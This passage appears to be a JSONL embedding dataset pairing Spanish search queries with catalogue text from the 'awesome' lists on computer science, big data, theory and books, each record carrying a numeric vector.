-0.01995, 0.16449, 0.06242, 0.04695, -0.05342, 0.04184, -0.03977, 0.05161, 0.06502, 0.01383, -0.08667, -0.05625, 0.07788, 0.03279, 0.06915, 0.04216, -0.1074, -0.02828, -0.00778, 0.03384, 0.01543, -0.01072, -0.05533, -0.07308, -0.05004, 0.08556, -0.01703, 0.07444, -0.02801, -0.06791, 0.07828, -0.02804, 0.019, 0.05199, -0.00704, -0.05101, 0.04602, -0.08161, 0.05635, 0.02307, 0.02197, -0.04254, -0.17747, -0.05439, -0.06497, 0.02571, 0.0249, -0.02513, -0.10315, -0.05333, 0.15009, 0.01758, -0.04025, -0.01027, -0.01576, 0.01216, -0.09362, 0.03969, 0.04817, -0.02073, 0.02137, 0.01134, -0.03524, 0.0129, 0.0506, -0.02517, -0.0153, -0.00728, 0.00439, -0.0427, -0.00192, 0.04714, -0.0033, -0.00079, -0.01844, -0.09694, -0.06131, 0.04988, -0.01756, -0.03252, -0.04322, 0.02647, -0.0661, -0.07606, 0.05303, -0.0148, -0.06292, 0.06921, -0.01114, -0.11049, 0.04313, -0.00818, -0.00066, 0.01324, -0.02468, -0.03086, -0.04196, -0.01653, -0.0213, -0.03101, 0.01698, -0.03553, 0.0233, 0.05662, -0.05629, -0.12266, 0.03718, 0.02126, -0.02336, -0.11972, -0.0436, 0.04156, -0.0259, 0.02346, 0.06623, 0.00216, 0.04732, 0.03303, 0.08573, 0.02548, 0.02251, 0.02283, 0.00764, -0.02332, 0.0046, -0.0212, -0.00839, -0.02336, 0.07381, 0.02235, 0.04155, 0.09259, 0.05076, 0.01925, -0.03086, -0.00106, 0.08281, 0.05085, -0.04033, -0.03414, 0.0634, -0.01364, -0.03279, 0.03943, 0.00987, -0.02032, -0.01019, -0.07074, -0.14121, 0.02535, 0.03741, -0.01388, -0.00115, -0.06333, -0.04587, -0.06775, 0.00861, 0.05267, -0.04206, -0.02256, 0.05057, 0.00853, -0.05505, 0.06809, -0.01737]} +{"tipo": "pregunta", "herramienta": "Computer Science", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Computer Science", "tema": "computer science", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Computer Science: Generative AI β€” Automatically generates a wide range of unique content in text, image, and audio format. Position-Based Quantum Cryptography β€” Theory on quantum cryptography that utilizes special relativistic constraints to achieve quantum-security under certain conditions.", "indexar": "con que puedo aplicar criptografΓ­a cuΓ‘ntica basada en posiciΓ³n?", "v": [-0.14197, 0.05555, -0.16941, -0.12983, 0.1394, -0.25932, 0.03965, 0.06982, -0.04755, 0.00764, 0.05879, -0.09677, 0.03185, 0.05035, 0.09704, -0.07942, -0.04927, -0.19453, -0.03926, -0.05663, -0.04369, -0.1987, -0.03547, -0.05473, -0.03461, 0.05027, 0.00514, 0.06404, -0.07828, 0.05026, 0.03782, 0.07183, -0.04222, 0.02616, -0.01937, -0.02923, -0.08112, -0.10131, 0.01385, 0.15067, -0.06439, 0.00103, 0.05405, -0.00022, -0.04519, 0.05458, -0.10408, 0.0632, -0.10433, -0.06489, -0.01603, -0.09575, -0.10693, 0.00865, -0.04342, -0.0534, 0.12053, -0.05563, 0.02399, 0.04192, -0.0076, 0.15055, -0.10944, 0.11214, 0.05154, -0.0319, -0.05051, 0.03784, -0.11488, 0.01547, 0.06303, 0.00726, -0.12531, 0.03546, 0.07919, 0.10001, -0.06127, 0.06526, 0.00859, 0.06026, -0.01663, 0.01789, -0.13739, 0.05044, -0.17557, 0.02217, 0.00487, -0.03311, -0.05031, -0.06683, 0.03727, -0.03371, -0.04177, -0.01785, 0.02003, -0.03604, -0.08915, -0.02944, -0.0382, -0.00126, 0.14316, -0.03587, -0.04944, 0.06172, 0.05677, 0.00846, -0.01218, -0.05238, -0.03958, -0.08969, -0.03717, 0.0026, -0.14892, -0.05062, -0.04823, -0.0614, 0.0324, 0.05574, -0.00395, -0.04498, -0.01104, 0.013, -0.07998, -0.01052, -0.01647, 0.03821, -0.07225, 0.10938, -0.03682, 0.00577, -0.0711, 0.00855, -0.12836, 2e-05, -0.03703, 0.04134, 0.0208, -0.05799, 0.02353, 0.01697, 0.01495, 0.05911, -0.03535, -0.02403, 0.05649, 0.01648, 0.05526, -0.07488, -0.05595, -0.04656, -0.02271, -0.01359, 0.02929, 0.07711, -0.01018, -0.05032, 0.05969, -0.0943, 0.02944, 0.03566, 0.01444, 0.0106, -0.05083, 0.04552, -0.02861, -0.04769, -0.03999, -0.00302, -0.02975, 0.05333, 0.02113, 0.05919, 0.03981, -0.07762, 0.06697, -0.05657, 0.03217, 0.02672, -0.03847, -0.04995, 0.03846, -0.01821, 0.03887, 0.0191, 0.08117, -0.00953, 0.05104, 0.0236, 0.01954, 0.00123, -0.00703, -0.04485, -0.04937, 0.06848, -0.01924, -0.05081, 0.05299, 0.03479, -0.02011, -0.01027, -0.00057, 0.02157, -0.05581, 0.00215, 0.00499, 0.05801, -0.0127, 0.06019, 0.00089, 0.02629, -0.01244, -0.05697, 0.0254, -0.03828, -0.07213, -0.07539, 0.03806, 0.01209, -0.01313, -0.00053, 0.00832, 0.04225, 0.04826, -0.03503, -0.03524, -0.06558, 0.01747, 0.01561, -0.01064, 0.04524, -0.02767, 0.06624, -0.08102, 0.04158, 0.07795, 0.03925, -0.06002, -0.0355, -0.00457, -0.06315, -0.01007, 0.05214, -0.01654, -0.06728, -0.022, -0.05963, -0.05441, 0.00436, 0.02111, -0.01964, -0.02126, 0.08133, 0.09859, -0.05108, -0.00036, 0.00864]} +{"tipo": "pregunta", "herramienta": "Big Data", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Big Data", "tema": "big data", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Big Data: Big Data. Public Datasets. Hadoop β€” Framework for distributed storage and processing of very large data sets. Data Engineering. Streaming. Apache Spark β€” Unified engine for large-scale data processing. Qlik β€” Business intelligence platform for data visualization, analytics, and reporting apps. Splunk β€” Platform for searching, monitoring, and analyzing structured and unstructured machine-generated big data in real time. Network Analysis.", "indexar": "que programa sirve para analizar grandes volΓΊmenes de datos distribuidos", "v": [0.11853, 0.0666, -0.06149, -0.1546, 0.02763, -0.04188, 0.09688, -0.13181, -0.12617, -0.09364, 0.02366, -0.17071, -0.09335, -0.1421, 0.01874, -0.03622, 0.04453, -0.19462, 0.0479, 0.03181, 0.08888, -0.0769, -0.06357, -0.08351, -0.09484, -0.02855, 0.02996, -0.05282, 0.00782, 0.12934, 0.02056, -0.03307, -0.04421, -0.22025, 0.00927, 0.04356, -0.07679, 0.08947, -0.02462, -0.02542, 0.06956, 0.04754, -0.07222, -0.02054, 0.07616, 0.00431, -0.11677, -0.00758, -0.01154, -0.09386, -0.02339, 0.12417, 0.02178, -0.01289, 0.01531, -0.07938, -0.01519, -0.07849, 0.03887, 0.03615, 0.0297, 0.03502, 0.07638, -0.09358, 0.07026, -0.01433, 0.03544, 0.025, -0.05489, 0.05487, -0.0674, 0.05706, 0.02809, -0.01037, 0.03088, 0.00683, -0.00541, 0.07653, -0.01947, -0.01183, 0.01245, -0.0323, -0.03465, 0.03861, -0.00978, 0.0228, 0.07131, -0.02575, -0.01382, -0.00751, 0.04236, 0.01566, -0.01486, 0.09097, 0.07303, 0.05882, 0.14458, -0.05894, 0.00183, 0.04654, 0.05512, -0.02609, -0.13333, 0.04417, -0.00975, 0.19752, 0.03964, -0.0661, 0.01133, 0.03926, -0.02732, 0.01562, -0.00624, -0.07239, -0.03495, -0.05888, -0.00709, 0.0007, 0.00133, -0.00264, -0.04485, 0.02869, -0.04347, 0.01312, -0.02635, -0.05645, 0.00231, 0.07758, 0.03249, 0.14204, 0.02876, 0.09673, -0.07611, 0.06788, -0.03675, -0.0498, -0.04877, -0.08478, -0.00902, -0.0616, 0.02301, 0.07652, -0.04887, 0.03397, 0.04028, -0.03109, 0.08008, 0.01829, -0.03874, -0.03785, 0.01219, 0.05242, 0.01917, 0.07327, -0.0413, -0.02244, 0.00376, -0.11228, -0.07675, -0.04871, 0.02759, 0.05023, 0.01332, -0.00377, 0.11505, -0.05579, 0.07431, 0.0013, 0.1575, 0.09562, -0.08309, 0.0465, 0.02666, -0.11915, 3e-05, -0.00187, -0.01949, -0.12841, 0.01625, -0.0106, -0.03547, -0.06375, 0.00212, -0.0236, -0.04067, -0.00608, -0.04588, -0.04012, -0.00943, -0.06782, 0.0502, 0.0736, 0.0487, -0.06699, 0.03547, -0.04873, -0.04621, 0.01275, 0.11882, -0.05396, -0.07797, 0.05786, -0.0556, 0.0551, 0.00292, 0.12384, -0.02695, 0.01476, 0.05075, 0.02772, -0.03443, -0.04062, 0.04056, -0.04237, -0.0718, -0.05598, 0.03856, 0.03417, 0.05973, 0.06128, -0.04535, 0.01728, 0.04959, -0.00946, -0.03504, -0.0532, 0.07781, -0.04057, 0.07815, 0.024, -0.05101, -0.00324, 0.02955, 0.0296, 0.04099, -0.01443, -0.0253, 0.00991, -0.04861, -0.08969, 0.00715, 0.07713, -0.03248, -0.01597, 0.01304, -0.05067, -0.10202, 0.00315, 0.02231, -0.04107, -0.05912, 0.01445, 0.02088, -0.05894, 0.04478, -0.02095]} +{"tipo": "pregunta", "herramienta": "Big Data", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Big Data", "tema": "big data", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Big Data: Big Data. Public Datasets. Hadoop β€” Framework for distributed storage and processing of very large data sets. Data Engineering. Streaming. Apache Spark β€” Unified engine for large-scale data processing. Qlik β€” Business intelligence platform for data visualization, analytics, and reporting apps. Splunk β€” Platform for searching, monitoring, and analyzing structured and unstructured machine-generated big data in real time. Network Analysis.", "indexar": "con que puedo hacer el procesamiento unificado de conjuntos de datos a gran escala", "v": [0.12243, 0.08925, -0.16361, -0.08799, 0.0229, -0.04041, 0.11253, -0.04482, -0.14662, -0.09022, -0.05827, -0.02486, -0.07217, 0.01084, 0.01677, 0.00422, 0.02184, -0.05939, -0.06944, -0.03283, 0.00014, -0.13019, -0.00837, -0.11675, -0.05561, -0.02831, 0.01431, 0.05591, -0.08497, -0.05406, 0.05154, 0.06015, -0.04495, -0.07871, 0.01535, -0.0044, -0.0284, 0.11233, -0.00132, -0.12693, -0.11349, 0.04043, -0.11855, -0.07724, 0.05987, -0.00886, -0.0265, 0.05645, -0.06013, -0.16883, -0.017, -0.03646, -0.03916, -0.05729, -0.06839, -0.10308, 0.14061, -0.07118, 0.12236, 0.03619, -0.03591, -0.0127, 0.04106, 0.00429, -0.01194, -0.01941, -0.03157, 0.06344, -0.03792, 0.07066, -0.06801, 0.13352, 0.03454, -0.05495, 0.03971, 0.0106, 0.06291, 0.07483, -0.07361, 0.02833, -0.03429, 0.00839, -0.05268, -0.027, -0.03387, -0.0174, -0.03826, -0.09199, 0.0545, -0.02825, 0.07385, 0.0081, -0.07738, -0.03058, 0.13323, 0.0291, 0.07996, -0.03331, -0.04822, 0.0559, 0.04834, 0.0167, -0.12325, 0.13478, 0.00454, 0.14321, 0.10958, 0.05819, -0.00293, -0.08627, -0.04076, 0.00876, -0.054, -0.0718, -0.04342, -0.03217, -0.06269, -0.13175, -0.07886, 0.00692, 0.0596, -0.07415, 0.06541, -0.04258, -0.00184, -0.04154, -0.04816, 0.11318, 0.01144, 0.02416, -0.09269, 0.021, -0.06544, -0.04072, 0.0672, 0.01952, -0.01955, -0.09189, 0.16135, -0.05923, 0.05958, 0.07925, -0.06808, 0.03235, 0.07883, -0.04561, 0.02233, -0.01389, -0.08078, -0.02423, 0.07722, 0.12271, -0.01434, 0.08211, -0.04177, -0.08318, -0.00245, -0.09085, -0.02342, 0.00103, -0.0638, 0.07991, -0.0757, 0.04224, 0.05629, 0.02479, 0.04458, 0.03038, 0.07156, -0.00621, -0.05569, 0.02271, 0.04918, -0.04343, 0.04805, 0.0553, -0.1318, -0.06332, -0.03213, -0.02202, -0.00241, -0.00239, 0.01067, 5e-05, -0.00132, 0.03392, 0.00372, -0.08133, -0.02283, 0.02639, -0.04471, 0.13411, 0.05788, -0.02212, 0.04315, -0.05682, -0.04243, 0.07601, 0.05007, -0.03862, -0.02021, -0.00011, -0.0363, 0.02752, -0.10187, 0.08549, -0.06353, 0.01336, 0.03444, 0.05204, -0.00033, -0.0183, 0.055, -0.06964, -0.08807, -0.02172, 0.03625, 0.03761, -0.01581, 0.04261, 0.00075, 0.09096, 0.06419, 0.02877, -0.02652, -0.02605, 0.02657, 0.02753, 0.02121, -0.01723, -0.03336, 0.03436, 0.01549, 0.0222, 0.05181, 0.07891, -0.05216, -0.03434, -0.06391, 0.00264, 0.01959, 0.04357, -0.05897, 0.02106, 0.01874, -0.07148, -0.0871, 0.04859, 0.01884, -0.08026, -0.03195, 0.02588, 0.01434, -0.01569, 0.02921, -0.05567]} +{"tipo": "pregunta", "herramienta": "Big Data", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Big Data", "tema": "big data", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Big Data: Big Data. Public Datasets. Hadoop β€” Framework for distributed storage and processing of very large data sets. Data Engineering. Streaming. Apache Spark β€” Unified engine for large-scale data processing. Qlik β€” Business intelligence platform for data visualization, analytics, and reporting apps. Splunk β€” Platform for searching, monitoring, and analyzing structured and unstructured machine-generated big data in real time. Network Analysis.", "indexar": "cual es una plataforma para visualizar datos y hacer reportes analΓ­ticos", "v": [-0.12985, 0.11185, -0.13486, -0.1278, 0.09985, -0.11026, 0.03092, -0.12763, -0.14811, -0.01924, -0.00828, -0.22035, -0.00961, 0.01732, 0.08781, -0.0096, 0.07713, -0.11618, 0.02178, -0.16418, -0.12421, -0.08681, -0.09422, -0.07957, -0.14043, -0.03779, 0.08933, -0.01539, -0.07333, 0.01886, -0.00859, -0.01841, -0.11407, 0.02101, 0.0363, 0.0366, 0.0129, 0.048, -0.00253, -0.05192, -0.06448, -0.00219, 0.00414, 0.0304, 0.05825, -0.05627, -0.08908, -0.03183, 0.03505, -0.02391, -0.02379, 0.07807, -0.13217, 0.11593, 0.03542, -0.06313, 0.10407, -0.09073, 0.14046, 0.09374, -0.05099, 0.03127, 0.117, -0.03923, -0.08355, 0.02333, 0.0336, 0.1145, -0.00663, 0.15588, 0.09441, 0.02909, 0.04793, -0.06144, 0.0064, 0.00759, 0.03528, 0.05669, -0.05468, 0.05044, 0.06041, -0.01506, -0.15997, 0.14032, -0.00756, -0.05515, 0.01234, -0.02385, -0.01078, -0.04394, 0.07276, 0.10705, -0.05589, -0.01483, 0.01159, -0.00609, 0.03307, -0.05117, -0.13992, -0.06582, -0.07621, 0.03945, -0.03374, 0.0091, 0.01711, 0.01357, -0.02913, -0.03913, -0.06547, -0.05772, 0.00228, 0.0502, -0.04208, 0.05568, 0.0455, -0.03558, -0.07056, -0.02747, -0.02152, 0.00726, 0.05862, 0.03346, -0.02449, -0.09083, -0.01141, -0.01732, -0.04958, -0.00429, -0.00372, 0.09454, 0.02011, -0.01303, -0.11136, 0.0465, 0.04274, -0.02345, 0.01829, -0.06811, 0.05862, -0.05644, 0.05173, 0.08567, 0.05093, -0.02027, 0.05712, -0.0339, 0.01455, 0.02907, -0.07345, 0.01097, -0.00452, 0.08341, -0.06146, 0.07673, -0.05643, -0.11055, -0.03659, -0.05683, -0.15003, -0.02574, -0.00913, -0.0277, 0.01064, 0.03293, 0.02999, -0.072, 0.0234, 0.04362, 0.01745, -0.05201, 0.02459, 0.05822, 0.09039, -0.17021, 0.0871, -0.02689, -0.09178, -0.03856, -0.04062, 0.0012, -0.03947, -0.04874, 0.00922, 0.03325, 0.00034, -0.02079, 0.06052, -0.07467, -0.00259, 0.03602, -0.01061, 0.09092, -7e-05, -0.00965, 0.07153, -0.06021, -0.0043, 0.0325, 0.08341, -0.00551, -0.04449, 0.03952, -0.01288, -0.02375, -0.02818, 0.05584, 0.03014, -0.09106, 0.06916, -0.05698, -0.04301, -0.03101, 0.00542, -0.03824, -0.03653, 0.00099, 0.0281, -0.04519, -0.02499, -0.04343, -0.04329, 0.01076, -0.00217, -0.03404, -0.02181, 0.04778, 0.09664, -0.00302, -0.03264, -0.04638, -0.01872, -0.03098, 0.01377, 0.00581, 0.01796, -0.03082, -0.01013, -0.01984, -0.02514, -0.01768, -0.01161, 0.01098, 0.01442, -0.01909, 0.01686, 0.00061, -0.01829, 0.04811, -0.02434, -0.10666, -0.01887, -0.0416, 0.03756, -0.02489, -0.00143, 0.00813]} +{"tipo": "pregunta", "herramienta": "Theory", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Theory", "tema": "theory", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Theory: Papers We Love. Talks. Algorithms. Education β€” Learning and practicing. Algorithm Visualizations. Artificial Intelligence. Search Engine Optimization. Competitive Programming. Math. Recursion Schemes β€” Traversing nested data structures. Audit Algorithms β€” Algorithmic audits of algorithms. AGI & CoCoSci β€” The reciprocation of Artificial General Intelligence (AGI) and Computational Cognitive Sciences (CoCoSci). Complex Systems β€” The scientific field studying systems with multiple interacting parts and emergent properties. VLM Architectures β€” Vision Language Model architectures.", "indexar": "que herramienta sirve para visualizar algoritmos complejos", "v": [0.12971, -0.02494, -0.1347, -0.2311, 0.11732, -0.16138, -0.03156, -0.01891, -0.00556, -0.09988, 0.06886, -0.09355, 0.10513, -0.02795, 0.1571, 0.00345, 0.11762, -0.17679, -0.06944, 0.03652, 0.01947, 0.00089, -0.14596, -0.03596, -0.08515, -0.07022, 0.02964, 0.04194, -0.15325, 0.06886, -0.07195, 0.07053, 0.06889, -0.11734, -0.08326, -0.05724, -0.10593, 0.03331, -0.02252, 0.02642, 0.01567, 0.09178, -0.04217, 0.07283, 0.03917, -0.00154, -0.08666, 0.08966, 0.00303, -0.00027, -0.07348, -0.07693, -0.12049, -0.03728, 0.02007, -0.15209, 0.13715, -0.10411, 0.00799, -0.08651, -0.04337, 0.01836, 0.03946, 0.00562, -0.07039, -0.06651, 0.00425, 0.06177, -0.02133, 0.03362, -0.08691, 0.06445, 0.02499, 0.04964, -0.02256, 0.03909, 0.04191, 0.00695, 0.05284, 0.00531, 0.05849, -0.04814, -0.07749, 0.03693, -0.08687, -0.09064, 0.00622, -0.00017, 0.04033, -0.10528, -0.08677, 0.06346, 0.001, 0.03703, 0.07432, 0.10609, 0.14526, -0.04785, -0.02219, 0.05693, 0.14157, -0.10938, -0.06023, 0.00877, -0.04909, 0.04407, 0.00099, 0.00275, -0.05611, -0.02851, 0.06477, -0.04195, 0.00059, 0.04547, -0.00458, 0.08099, 0.04075, 0.03559, -0.00566, -0.0465, 0.09809, 0.05806, -0.05036, -0.0843, -0.00715, 0.04472, 0.00843, 0.08591, -0.00847, -0.09885, -0.05581, -0.02092, -0.10401, 0.07225, -0.04555, 0.00071, 0.10167, -0.16156, -0.02749, 0.02354, -0.01874, 0.04023, -0.03167, -0.13193, 0.01809, 0.01361, 0.09476, -0.05484, -0.05014, -0.01602, 0.10304, -0.10513, -0.02305, -0.0115, -0.06676, -0.05411, -0.0739, -0.01785, -0.10413, 0.0156, -0.0213, -0.00898, 0.03698, 0.05108, 0.02903, -0.03703, 0.05265, -0.01611, 0.04739, 0.04773, -0.01543, 0.02384, 0.002, -0.06286, -0.01712, 0.06776, -0.0724, 0.03156, -0.02442, 0.00682, -0.05316, -0.03222, -0.01247, -0.04997, 0.00591, -0.03599, -0.01259, -0.03407, -0.03641, 0.00063, -0.00936, 0.04388, -0.02108, -0.03709, 0.08748, 0.00721, -0.04749, -0.03657, 0.02998, -0.00596, 0.00607, 0.02949, 0.00485, -0.01434, -0.01605, 0.13014, 0.01182, -0.04026, 0.00317, 0.01491, -0.01872, -0.01947, -0.00793, -0.01174, 0.00243, -0.0366, -0.03577, 0.03263, -0.00738, 0.01447, 0.00682, -0.02044, 0.01008, -0.02091, -0.00831, 0.03131, 0.00348, 0.05268, 0.0146, -0.0802, -0.01033, -0.02144, -0.03447, 0.02854, 0.01788, -0.04403, -0.00947, -0.03297, -0.03743, -0.04421, -0.0454, 0.00869, 0.04307, -0.05872, -0.02731, -0.06957, 0.02091, -0.03395, -0.04155, -0.05275, -0.06852, 0.01997, 0.05359, -0.0342, 0.04157, -0.00582]} +{"tipo": "pregunta", "herramienta": "Theory", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Theory", "tema": "theory", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Theory: Papers We Love. Talks. Algorithms. Education β€” Learning and practicing. Algorithm Visualizations. Artificial Intelligence. Search Engine Optimization. Competitive Programming. Math. Recursion Schemes β€” Traversing nested data structures. Audit Algorithms β€” Algorithmic audits of algorithms. AGI & CoCoSci β€” The reciprocation of Artificial General Intelligence (AGI) and Computational Cognitive Sciences (CoCoSci). Complex Systems β€” The scientific field studying systems with multiple interacting parts and emergent properties. VLM Architectures β€” Vision Language Model architectures.", "indexar": "con que puedo practicar recursiΓ³n y esquemas de recursividad", "v": [0.00498, 0.08872, -0.22854, -0.21179, 0.19947, -0.0328, 0.01319, 0.06787, 0.10672, -0.04877, 0.04597, -0.00316, 0.02007, 0.02129, 0.12824, 0.0269, 0.00876, 0.12398, -0.08647, 0.02083, -0.0355, -0.21209, -0.02499, 0.14324, 0.02715, 0.04365, 0.02597, 0.0128, -0.04096, -0.16716, -0.01737, 0.09983, 0.05131, -0.12469, -0.12989, 0.03593, 0.03695, 0.1258, -0.03735, 0.03182, -0.04699, 0.01069, -0.16132, 0.01656, -0.0551, 0.00551, -0.06152, 0.02972, -0.12797, -0.01956, -0.07239, -0.05615, -0.16248, -0.07998, -0.10896, -0.04685, 0.07632, -0.09972, 0.02504, -0.08894, -0.01252, 0.01655, 0.08697, -0.02767, 0.06785, -0.02427, -0.03794, -0.02483, 0.01417, 0.08784, -0.03584, 0.03964, 0.00046, -0.05027, 0.00331, 0.05853, 0.06247, -0.04244, 0.02805, 0.13707, -0.13627, -0.12687, -0.06638, 0.04686, -0.06274, -0.02362, 0.02544, -0.04379, 0.0612, -0.07394, -0.04241, -0.01476, 0.00792, -0.01627, -0.00669, -0.03684, 0.00843, 0.06268, 0.017, 0.03783, 0.01536, 0.06196, -0.08452, 0.18016, 0.05416, 0.0514, -0.01943, 0.06281, -0.10744, -0.02121, -0.04748, 0.0204, -0.07144, 0.01772, -0.03072, -0.0366, -0.08058, -0.00797, 0.00571, 0.09146, 0.04806, -0.00439, -0.03117, 0.00814, 0.0881, 0.00436, 0.04654, 0.12422, 0.0207, 0.05124, -0.00464, 0.05588, -0.03537, 0.03066, -0.02842, 0.0274, 0.10713, -0.01476, 0.03111, -0.04678, 0.08908, 0.01696, 0.00594, -0.0383, -0.0236, 0.03021, 0.08162, -0.02466, -0.01957, -0.00604, -0.02919, 0.04053, 0.04981, 0.03511, -0.00916, -0.00979, 0.08979, -0.07205, 0.00534, 0.02051, -0.09621, 0.06558, 0.09794, 0.06082, 0.00605, 0.05446, -0.07381, -0.03535, 0.02492, 0.0101, -0.06097, -0.06112, 0.02423, -0.00962, 0.06814, -0.04035, -0.0761, 0.02437, -0.02833, -0.02585, -0.02354, -0.01084, -0.09835, -0.0239, -0.00438, -0.04131, -0.01806, 0.11458, 0.07437, -0.00561, -0.02488, 0.0339, -0.02965, -0.04887, 0.01796, 0.02887, -0.01595, 0.03749, 0.06653, 0.01701, 0.00725, -0.02634, 0.01649, -0.0086, 0.07976, 0.07455, -0.00927, -0.00797, 0.05585, 0.02854, 0.05284, -0.05905, 0.04879, 0.01761, -0.06993, 0.00055, 0.03047, -0.0008, -0.06172, 0.02252, 0.06349, 0.03633, 0.01185, 0.06657, -0.00506, -0.05798, 0.00122, 0.00752, 0.00313, 0.0099, -0.02323, 0.07326, -0.04768, -0.00896, -0.02229, 0.00387, -0.00069, -0.02223, 0.03846, 0.01506, -0.00249, 0.0224, -0.00475, 0.00506, -0.01412, -0.01283, -0.04271, -0.02506, 0.0048, -0.00759, -0.02186, 0.02789, 0.04333, -0.08677, 0.02452, -0.07185]} +{"tipo": "pregunta", "herramienta": "Theory", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Theory", "tema": "theory", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Theory: Papers We Love. Talks. Algorithms. Education β€” Learning and practicing. Algorithm Visualizations. Artificial Intelligence. Search Engine Optimization. Competitive Programming. Math. Recursion Schemes β€” Traversing nested data structures. Audit Algorithms β€” Algorithmic audits of algorithms. AGI & CoCoSci β€” The reciprocation of Artificial General Intelligence (AGI) and Computational Cognitive Sciences (CoCoSci). Complex Systems β€” The scientific field studying systems with multiple interacting parts and emergent properties. VLM Architectures β€” Vision Language Model architectures.", "indexar": "hay alguna tΓ©cnica para auditar los propios algoritmos", "v": [0.09371, -0.02904, -0.02104, -0.23138, 0.08093, -0.10035, 0.07264, 0.0019, -0.08916, 0.0614, -0.10764, -0.08833, 0.07294, 0.1725, 0.12906, -0.0962, 0.15875, -0.17032, 0.0334, -0.00945, 0.01801, 0.02226, -0.10804, 0.03205, -0.09984, -0.06418, 0.07078, 0.01858, -0.05752, 0.04488, -0.06477, 0.1603, 0.12169, -0.07309, -0.19461, -0.0305, 0.07081, 0.02945, 0.04732, 0.11175, 0.02047, -0.00899, -0.04239, 0.09475, 0.1763, 0.00084, -0.04255, 0.14649, 0.04714, -0.07241, -0.05663, 0.04518, -0.06421, -0.00558, -0.02013, -0.05878, 0.03336, -0.02344, 0.02363, -0.19418, -0.0586, -0.01318, 0.01872, 0.04407, -0.05614, -0.01843, -0.02476, 0.03347, 0.0361, 0.03229, -0.0145, 0.04722, -0.01346, 0.0668, -0.01953, -0.012, 0.02582, 0.00867, 0.0365, -0.037, -0.035, -0.08854, 0.01176, 0.0193, -0.12359, -0.08272, -0.04738, 0.02841, -0.0258, -0.12434, -0.07655, 0.01995, 0.02228, -0.06135, 0.00055, 0.13185, 0.15809, -0.0272, -0.06004, 0.01809, 0.04887, -0.11562, -0.01913, 0.02666, 0.03176, 0.14787, 0.02748, 0.01109, 0.05319, -0.03836, -0.02447, -0.00034, -0.12977, 0.01526, -0.11297, -0.00475, 0.07679, -0.00134, -0.00093, 0.0324, 0.04466, 0.02425, -0.02628, 0.00206, -0.05266, -0.07206, 0.06288, 0.06092, 0.04621, -0.02373, -0.00719, -0.00095, -0.08406, -0.04286, -0.03393, 0.03953, 0.00358, -0.05315, -0.08458, 0.04094, -0.09554, 0.03791, -0.03842, -0.03782, -0.0195, 0.0296, 0.05896, -0.0812, -0.11823, -0.07306, 0.04904, -0.08054, -0.08132, 0.00984, -0.10256, -0.01763, -0.01334, -0.06967, -0.0488, 0.00668, 0.02131, -0.00189, 0.00848, 0.0395, 0.00092, 0.03, 0.02848, -0.05801, -0.02557, -0.0123, -0.07305, 0.04094, -0.10956, -0.04762, 0.07643, 0.08166, -0.06416, -0.02242, 0.04368, -0.04409, -0.03053, -0.00856, 0.02954, -0.1001, 0.04669, -0.00047, -0.00163, -0.012, 0.03886, 0.03447, 0.03354, -0.05349, -0.02965, 0.00514, 0.02741, -0.02472, -0.03191, 0.00758, -0.07205, 0.03243, -0.01146, 0.03973, -0.01525, -0.00806, 0.02581, 0.06599, 0.06138, -0.05243, -0.00511, -0.00406, 0.00759, -0.03984, -0.02135, -0.02927, -0.00229, 0.04558, -0.03297, 0.0008, -0.04692, 0.03966, 0.01536, -0.02159, 0.04966, 0.01701, 0.00537, 0.03762, 0.05412, 0.06754, 0.00659, -0.03697, -0.04469, -0.02819, 0.01608, 0.03375, 0.01525, -0.0045, 0.01059, -0.03883, 0.05355, -0.06094, -0.05598, -0.02257, 0.04263, -0.07093, -0.00967, -0.03992, -0.01074, -0.00563, -0.06249, -0.02202, 0.04452, -0.01495, 0.02478, -0.02868, 0.05519, -0.02636]} +{"tipo": "pregunta", "herramienta": "Books", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Books", "tema": "books", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Books: Free Programming Books. Go Books. R Books. Mind Expanding Books. Book Authoring. Elixir Books.", "indexar": "que libros gratuitos de programaciΓ³n me recomiendan para aprender?", "v": [0.14191, 0.19162, -0.07908, -0.21134, -0.00973, -0.086, -0.04473, 0.04678, -0.09592, -0.1965, 0.01477, -0.03059, 0.06617, -0.08799, 9e-05, 0.06699, 0.07761, -0.00945, 0.15957, 0.05589, 0.04852, -0.03736, -0.14485, -0.04014, -0.04554, -0.11449, 0.04504, 0.00506, -0.01893, 0.15022, -0.01836, 0.02867, 0.04698, -0.13305, -0.06255, 0.00626, 0.0659, 0.05626, -0.00405, 0.00308, -0.039, 0.06893, 0.02957, 0.03156, 0.00386, -0.00184, 0.0317, 0.01838, -0.06083, 0.02336, 0.00087, 0.01461, 0.12428, -0.0704, 0.06393, -0.06136, -0.0326, -0.06211, -0.03443, -0.10239, 0.03455, 0.07969, 0.0165, -0.07269, 0.09015, 0.05725, 0.06546, 0.04837, -0.11945, 0.14055, 0.02011, 0.01807, -0.02527, -0.02087, -0.0584, 0.00171, 0.07287, -0.03432, 0.14173, -0.01214, -0.03586, -0.04543, 0.07295, 0.01408, -0.00902, 0.02703, -0.04205, -0.01303, 0.03025, -0.03464, -0.06387, 0.12343, -0.05329, 0.03605, 0.06822, -0.02202, 0.07774, -0.0151, 0.05146, 0.13433, 0.00331, -0.09728, -0.02035, 0.05846, -0.03278, 